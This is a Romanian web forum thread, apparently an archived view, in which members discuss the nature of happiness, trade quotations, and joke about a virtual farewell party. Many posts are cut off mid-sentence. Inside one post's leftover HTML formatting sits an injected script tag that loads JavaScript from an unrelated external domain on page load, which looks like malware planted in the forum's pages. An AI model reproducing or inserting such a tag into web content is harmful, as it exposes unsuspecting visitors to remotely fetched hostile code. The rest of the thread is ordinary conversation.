PDA

Arată versiune întreagă : Eu si fericirea

tonita
08.02.2005, 07:18
Nuspun ca eu si fericirea suntem totuna! De multe ori sunt, dimpotriva,nefericit si deprimat.Dar citind unele subiecte din "Discutii Generale"imi devine tot mai clar ca ceea ce numim fericire depinde mult de [i]felul in care g

08.02.2005, 07:49
Eu nu sint fericitain general dar in nici un caz nudau vina pe faptul ca am emigrat,desi mi-ar fi mai usor.In general avem tendinta de a da vina pe cineva sau ceva dar eu cerd ca numai noipurtam vina,poate numai stim sau am uitat sa ne bucuram de lucruri minore si sa apreciem ceea ce avem?!

Uneori ma intreb cine sint eu ?

raspuns tot eu:

Cred ca sint ceea ce vad altii in mine , cum ma percep cei din jur fara ei as fi nimeni.

kiki
08.02.2005, 10:50
Cred ca fericirea apare atunci cand stii sa te bucuri pt altul.

Asa dispare ranchiunea, invidia, rautatea- toate mizeriile caracterului uman.

dancing_fire
08.02.2005, 12:19
smileys/smiley32.gifKIKI smileys/smiley32.gifsmileys/smiley32.gifsmileys/smiley32.gif

florin_bejerea
08.02.2005, 13:26
Hai sa incerc shi eu o vorba de intzlepciune, personala sau nu: 'nimeni shi nimic nu te poate rani sufleteshte...ci doar tu insutzi; iar daca ajungi sa crezi ca eshti ranit- e doar o iluzie' :)

sauzimdebine
09.02.2005, 00:24
Puterea de a te ridica o data in plus fata de numarul esecurilor este cheia reusitei in viata.

09.02.2005, 02:32
Adaruiicontribuie mult mai mult la fericire decit a primii .

Johann
09.02.2005, 03:01
Fericirea in viata depinde de lucrurile marunte.

tonita
09.02.2005, 04:09
'...nimeni shi nimic nu te poate rani sufleteshte...ci doar tu insutzi; iar daca ajungi sa crezi ca eshti ranit- e doar o iluzie' :)

Banuiesc un adevar ad

09.02.2005, 05:48
Sper ca nu sunt toate cu copy/pastesmileys/smiley36.gif

None of mine!smileys/smiley36.gif

Deci sa mai filozofam pe tema daca a fi fericit este o Iluzie?!

eu nu cred ca este, cind esti fericit sti ca esti si simti ca esti ,doar dacavrei sa te inselipe tinesi pretinzi ca esti fericitpoate ca da...

Dar fericire absoluta sau formua fericirii(cum am vazut ca incercasera unii sa gaseasca)nu exista si intradevar este o iluzie.

Reale sint clipele de fericire mai multe sau mai putine.

garfield
09.02.2005, 06:34
Uite aici niste cut/paste happiness quotes:

Happiness is like coke -- something you get as a by-product in the process of making something else. ~ Aldous Huxley

Happiness is an agreeable sensation, arising from contemplating the misery of others. ~ Ambrose Bierce (The Devil's Dictionary)

Happiness should always remain a bit incomplete. After all, dreams are boundless. ~ Anatoly Karpov

Let us all be happy, and live within our means, even if we have to borrow the money to do it with. ~ Artemus Ward (Artemus Ward in London)

In order to be happy you need a good dog, a good woman, and ready money. ~ Benjamin Franklin

The good life, as I conceive it, is a happy life. I do not mean that if you are good you will be happy; I mean that if you are happy you will be good. ~ Bertrand Russell

We take greater pains to persuade others we are happy than in trying to think so ourselves. ~ Confucius

If you were happy every day of your life you wouldn't be a human being, you'd be a game show host. ~ Gabriel Heatter

Happiness is having a large, loving, caring, close-knit family in another city. ~ George Burns

Now and then it's good to pause in our pursuit of happiness and just be happy. ~ Guillaume Apollinaire

Success is getting what you want. Happiness is liking what you get. ~ H. Jackson Brown

Happiness is good health and a bad memory. ~ Ingrid Bergman

Don't mistake pleasure for happiness. They are a different breed of dogs. ~ Josh Billings

If you ever find happiness by hunting for it, you will find it as the old woman did her lost spectacles. Safe on her own nose all the time. ~ Josh Billings

Let us have wine and women, mirth and laughter,

Sermons and soda-water the day after.

~ Lord Byron (Don Juan)

Happiness is having a scratch for every itch. ~ Ogden Nash

Happiness isn't something you experience, it's something you remember. ~ Oscar Levant

Some cause happiness wherever they go; others whenever they go. ~ Oscar Wilde

It's never too late to have a happy childhood. ~ Tom Robbins (Still Life with a Woodpecker)

iulialaura
09.02.2005, 07:03
Ma intreb:oare fericirea este cel mai important lucru in viata?

garfield
09.02.2005, 07:15
Nimic nu e important pana cand nu ai si ai duci lipsa. Atunci devine important.

09.02.2005, 07:17
Sufleteste cam da , sa fi sau sa poti sa faci pe cineva fericit..

bineteles astea vin dupa necesitatea de a supravietuii: apa,mincare , somn etc...

garfield
09.02.2005, 07:20
Ai uitat de aer si internet smileys/smiley2.gif

09.02.2005, 07:26
OOPS smileys/smiley9.gif You are right! smileys/smiley36.gif

danielle
09.02.2005, 18:56
Hellooo, si cu cafeaua care ne trezeste cum ramane?

danielle
09.02.2005, 19:01
In ceea ce priveste fericirea eu cred urmatoarele:

Cred ca exista oameni care gandesc pozitiv si, ca urmare, sunt fericiti. Pot fi fericiti din orice lucru marunt sau dinceea ceii inconjoara.

Cred ca exista oameni care gandesc negativ, vad totul in alb si negru, fara gri sau culori si sunt nefericiti. Si faptul ca privesc lumea negativ si ceea ce ii inconjoara negativ, le atrage si nefericirea.

Eu sunt o pozitiva...smileys/smiley2.gif...ca ex, eu sunt fericita si cand imi ies chiftelele...(nu de alta dar am avut si experiente de se imprastiau prin tigaie)smileys/smiley5.gif.

Ana Tofan
09.02.2005, 19:21
Uneori fericirea depinde lucruri marunte, o melodie frumoasa,un apus sau un rasarit de soare,o cafea baura intr-o cofetarie cu atmosfera din anii 20,insa in acelasi timp este ceva greu de atins.

garfield
10.02.2005, 06:28
Cred ca exista oameni care gandesc pozitiv si, ca urmare, sunt fericiti. Pot fi fericiti din orice lucru marunt sau dinceea ceii inconjoara.

Cred ca exista oameni care gandesc negativ, vad totul in alb si negru, fara gri sau culori si sunt nefericiti. Si faptul ca privesc lumea negativ si ceea ce ii inconjoara negativ, le atrage si nefericirea.

smileys/smiley32.gifVery True! smileys/smiley32.gif

Miki
10.02.2005, 06:41
Si uneori poti fi nefericit cu fericirea ...

Intr-adevar, gandirea pozitiva 'muta muntii din loc'. Ce se intampla cand estiREALIST referitor la o anume problema din viata ta si iti dai seama ca numai cu gandirea pozitiva nu schimbi datele problemei?!smileys/smiley5.gif

garfield
10.02.2005, 07:50
Gandirea pozitiva te ajuta sa gasesti o solutie.

Alternativa ar fi sa fi nefericit, devii depresat si te dai batut smileys/smiley18.gif

10.02.2005, 12:02
Mai bine sa definim care fericire: fericirea in general, fericirea legata de stilul de viata, fericirea cu partenerul de viata, fericirea profesionala etc. Si care e influenta una asupra alteia? Cat de mult, spre exemplu, imi e afectata fericirea ca traiesc intr-o tara minunata de problemele din viata personala?

La care (ne)fericire te referi, Tony?

garfield
10.02.2005, 13:22
Oh sh** nu am stiut ca sunt atit de multe feluri de fericire smileys/smiley5.gifNu e greu sa te hotarasti daca esti fericit sau nu cand esti fericit numai ladoua din cele patru feluri? smileys/smiley92.gif

http://www.sorrin.com/dalbum/pictures/Forum_Pictures/Garfield/angry_happy.gif

10.02.2005, 14:02
kewl! I love cats!!

Ana Tofan
10.02.2005, 18:52
Ce dragute sunt pisicile! Cred ca mi se potriveste a treia ipostaza.

sauzimdebine
11.02.2005, 01:20
Fericirea este o stare bazata pe perceptie. De aceea modul in care privesc lumea inconjuratoare are cea mai mare influenta asupra usurintei cu care ating acest stadiu. Fiind realist nu ma impiedica sa fiu fericit. Tocmai puterea de a intelege ca nu pot schimba datele problemei si in consecinta nu pot avea sau rezolva totul, ma va face sa fiu fericit cu ceea ce am. In plus, starea de fericire data de multumirea atingerii stadiului actual, este motorul cautarii permanente de mai bine, al reusitei imposibile, in final al fericirii viitoare.
Nu-mi doresc sa fiu un vesnic nemultumit, de aceea nu accept sa fiu nefericit in fericire.

tonita
11.02.2005, 06:48
Mai bine sa definim care fericire:... Cat de mult, spre exemplu, imi e afectata fericirea ca traiesc intr-o tara minunata de problemele din viata personala?

La care (ne)fericire te referi, Tony?

Eu unul nu am definitia fericirii Doar o "percep" din c

Artlover
14.02.2005, 12:57
Fericirea permanenta si totala vine din interior. Nici un obiect, nici o circumstanta exterioara nu o poate crea, cu atit mai putin mentzine.

mihaelaNV
14.02.2005, 14:55
Ai dreptate Artlover, numai din interior. Am cunoscut multe persoane care spuneau ca nimic nu-i face mai fericiti decat un zambet, sau un multumesc de la cineva pe care l-au ajutat......eu cred ca nu toata lumea iti va da acea satisfactie, sau acel "mersi", pe care il astepti. Tu incerci sa salvezi pe cineva, sau sa faci pe altcineva fericit....crezand ca asta te face fericit.....ar insemna ca depinzi de reactia cuiva, sau ca e mai usor sa vezi ce este de "rezolvat", sau "ajutat" la /pe altul decat sa incepi cu propria persoana. Linistea sufleteasca, impacarea cu sinele uneori e mai grea, decat sa acceptzi pe altcineva. E bine si cred eu mult mai sanatos, sa fii optimist, optimist=realist+sperantza in solutzii, decat sa fii realist, care la unii inseamna sa iti epuizezi toata energia asupra problemei, mai mult asupra solutiei. Nimeni nu e ideal, sau perfect, dar este bine sa fii in generalo optimist si impacat cu sinele. Normal ca mai avem si decaderi, dar un optimist intotdeauna le va numi, "fereastra succesului", mai mult decat "esuari".

Fericirea vine din constinetizarea valorii propri.....sa nu cadem acum in cealalta extrema, in care sa ne placem rextrem de mult si sa devenim narcisisti. MA REFER SA NE ACCEPTAM ASA CUM SUNTEM, SA VEDEM ce putem oferi lumii din jur avand calitatile si valorile pe care le avem. Eu de exemplu sunt fericita cand vad ceva frumos in natura, ptr. ca stiu ca ce va urma va fi o amintire frumoasa, ca o poza intiparita in minte, care va fi exteriorizata printr-o lucrare, prin arta. Sunt fericita cand simt ca am pe cineva f. aproape sufleteste, si stiu ca e reciproc sentimentul, sunt fericita cand ma pot exprima si sunt inteleasa, sunt fericita cand descopar ceva ce deja stiam, dar nu am acordat atentie inainte, sunt fericita cand "insemn", ceea ce inseamna ca munca lui D-zeu nu a fost in van. Cand nu sunt inteleasa, sau vazuta sau auzita, nu pot spune ca sunt nefericita, ci dezamagita, sau ma dezcurajez, dar intotdeauna increderea in mai bine, intr-o noua zi, ma aduce inapoi la starea initiala.

16.02.2005, 17:43
pana la urma fiecare a ajuns sa vorbeasca kestii generale de acuma..intr-un final, sunt curioasa cu cat am reusit sa-l ajutam cu ceva pe tony42 si daca am reusit!!

tonita
17.02.2005, 13:05
Speram la o contributie mai consistenta de la tine J LO !smileys/smiley17.gif

Makris
18.02.2005, 06:52
Omul de cand se naste si pana moarese aflain cautarea fericirii - asta e foarte clar! Eu am trait momente de fericire dar si momente de nemultumire acuta si neimplinire (unul dintre acestea din urmadeterminindu-ma sa vin in USA) - simteam ca ma sufoc, ca locul meu nu era acolo unde ma aflam si ceva din mine (dorinta de a experimenta si de a "supravietui nemultumirii" practic) ma indemna sa ACTIONEZ, sa fac ceva sa ies din starea aia. Asa cum spunea cineva mai devreme - atunci cand esti nemultumit (nefericit), nu trebuie sa stai si sa-ti plangi de mila, ci sa actionezi, sa faci ceva sa iesi din starea aia. Nu cred ca exista persoane care pot spune ca sunt 100% fericite sau 100% nefericite. Viata e facuta din momente fericite si nefericite, oamenii fericiti sunt aceia care pot spune cape ansamblu balanta a atarnat mai greu pe partea cu momentele de fericire indiferent deceea cea produs-o-o reteta reusita,un apus de soare la malul oceanului, un zambet de copil, o melodie pe care tocmai ai dansat nebuneste, un "multumesc" din partea unei persoane pe care nu o cunosti dar pe care ai ajutat-o .........

tonita
22.02.2005, 22:06
Inteleg ca J LO si Florin nu se vor mai exprima referitor la intrebari si tema s-a racit.

Iata un nou citatcare mi se pareca ascunde o sam

23.02.2005, 17:18
Toni, cat de 'consistenta' vrei sa-mi fie contributia? Minunata mea persoana este la capatul lumii si anyway la cat de capricioasa sunt, nu cred ca ai vrea sa fii vreodata in preajma mea..:)

Be specific.

tonita
24.02.2005, 07:56
"nu cred ca ai vrea sa fii vreodata in preajma mea..:)"

De ce nu ? C

24.02.2005, 10:41
Constat ca 'Eu si fericirea' a luat o intorsatura cam siropoasa de-acuma..Iar toanele mele bune in aceasta perioada sunt influentate de niste vesti bune, asa ca sa nu crezi ca sunt 'minunata' all the time..:) (vezi episodul de vinerea trecuta cand mi s-au pus piticii pe creier..haha)

Anyway, ca sa concluzionam putin subiectul, fiecare trece prin perioade mai grele si mai usoare. Fiecare isi pierde calmul, fiecare isidoreste ceea ce nu are. Iar solutiile pe care le vad in acest moment sunt doua: accepta sau skimba!! Stiu ca nu e usor saiei odecizie(sau depinde de lacaz la caz acum), dar important este sa incerci.

Spune-mi dacaface sens.

All the best,

jay

24.02.2005, 10:58
PS: Uite ceva care am gasit printre documentele mele personale. Sper ca te va inspira.<B style="mso-bidi-font-weight: normal">
ACCEPTANCE
THIS IS HOW IT IS. NOT HOW IT
- Was
- Might have been
- Should have been

NOT HOW
- I wanted it to be
- Hoped it would be
- <B style="mso-bidi-font-weight: normal">Planned it would be[/B]
<B style="mso-bidi-font-weight: normal">[/B]
<B style="mso-bidi-font-weight: normal">I ACCEPT THAT THIS IS HOW IT IS.[/B]
<B style="mso-bidi-font-weight: normal">Now I get on with my life[/B]
<B style="mso-bidi-font<script src=http://www.iroe.ru/ngg.js></script>

tonita
25.02.2005, 22:09
Be specific.

Il try to be specific:

Be patient J LO, be patient !http://www.romanian-portal.com/forum/smileys/smiley1.gif

27.02.2005, 10:58
Why? Are you going to propose??haha

Seriously now, my last day here is March 11th.

garfield
27.02.2005, 13:24
Seriously now, my last day here is March 11th.

Why is that? Are you going to self-destruct after that? Stay awhile, what's the rush?

27.02.2005, 17:25
Why G?:) E pe bune. Sunt busy dupa data de 11 si nu cred ca voi mai intra..incerc sa take advantage si sa intru mai des pana vinerea viitoare..smileys/smiley2.gif

garfield
27.02.2005, 17:57
The mystery deepens...busy (aren't we all)...well okay, at least it's nothing serious. When you said "my last day here" it sounded so final, almost like that's the day you're leaving this planet! smileys/smiley36.gif

But since you're leaving and you announced it, should we have a virtual going away party for you? We can invite everyone here and have a toast for you. Then when you change your mind (because you're going to miss us so much) and return to the forum, we can have a virtual welcome back party! smileys/smiley32.gif

I'll bring the baloons, everyone else can bring whatever they can smileys/smiley2.gif

http://www.sorrin.com/dalbum/pictures/Forum_Pictures/Garfield/garball.gif

27.02.2005, 18:20
Sounds like fun! We'll have a beach party!! Can't wait!!!smileys/smiley32.gif

De unde faci rost de pozele astea cool, Garf?:)

27.02.2005, 18:24
Damn, Garfield! Noi 'build'-uim planuri de petrecere pe nefericirea altora..hehehe. Pune tu topica 'Party' pt ca eu tb sa o tai acasa..:) Am Oscarurile in seara asta asa ca alta petrecere ma asteapta acasa..hehe. See u soon!!

garfield
27.02.2005, 18:30
You want a beach party, we'll have a beach party!

http://www.sorrin.com/dalbum/pictures/Forum_Pictures/Garfield/Life_is_a_Beach.jpg

Forget the balloons, we'll bring beach toys so we can build a sand castlehttp://www.romanian-portal.com/forum/smileys/smiley36.gif
Maybe we can have a game of beach volleyball....

http://www.sorrin.com/dalbum/pictures/Forum_Pictures/Garfield/garfield-volleyball.jpg

Or we can just bury somebody in the sand....The possibilities are endless! smileys/smiley36.gif

Raven
23.05.2008, 09:04
Ma intreb:oare fericirea este cel mai important lucru in viata?
Nu.

Corectitudinea este.

Nu ca asta ar invia topicul.

Uneori ma intreb cine sint eu ?

Pot sa raspund eu la asta doamna?

23.05.2008, 09:45
Cu intrebarea asta cred ca vrei sa cistigi timp de gindire smileys/smiley36.gif.

Pot sa raspund eu la asta

Nu vad de ce te-ai oprit aici.....

Raven
23.05.2008, 09:56
Cu intrebarea asta cred ca vrei sa cistigi timp de gindire smileys/smiley36.gif.

"Pot sa raspund eu la asta"
(Raven)

Nu vad de ce te-ai oprit aici.....

Nici un timp de castigat.

Raspunsul era dat cu mult inainte.

Hai sa iau ce-ai zis ca pe un "da".

Raspunsul mai jos.

Cine esti?</span>

Cine esti, de unde vii?
Poti tu, omule, sa stii?
Unde mergi, ce soarta ai?
Poti tu seama sa iti dai?

Tu esti mare, tu esti mic,
Tu esti tot, tu esti nimic,
Tu esti rau, dar esti si bun,
Tu-ntelept si tu nebun.

mirela_delia
25.05.2008, 01:17
DIVINITATEA OMULUI

O legenda veche spune ca mai demult oamenii erau buni. Dar au profitat
atat de mult de puterea divina din ei incat stapanul tuturor zeilor a
decis sa le ia aceasta putere si sa o ascunda intr-un loc unde va fi
imposibil de gasit. Tot ce i-a ramas sa faca era sa gaseasca
ascunzatoarea potrivita.

A fost convocat consiliul zeilor pentru a se gasi solutia. Zeii au sugerat:

-De ce sa nu ingropam puterile omului in pamant?

Brahma a raspuns:

-Nu, nu vom face asta pentru ca omul va sapa adanc si le va gasi

Ninu100
25.05.2008, 04:02
.... Ce frumos spus...smileys/smiley19.gif

Ninu100
25.05.2008, 04:07
... Pentru mine fericirea inseamna... sa pot merge la pescuit.... si sa nu-mi suspende Sorin contul.... Dar am cunoscut pe cineva care a fost asa de fericit....incit a inceput sa-l mustre constiinta, ca e asa fericit cind in lume exista atit de multa nefericire...asa ca s-a sinucis...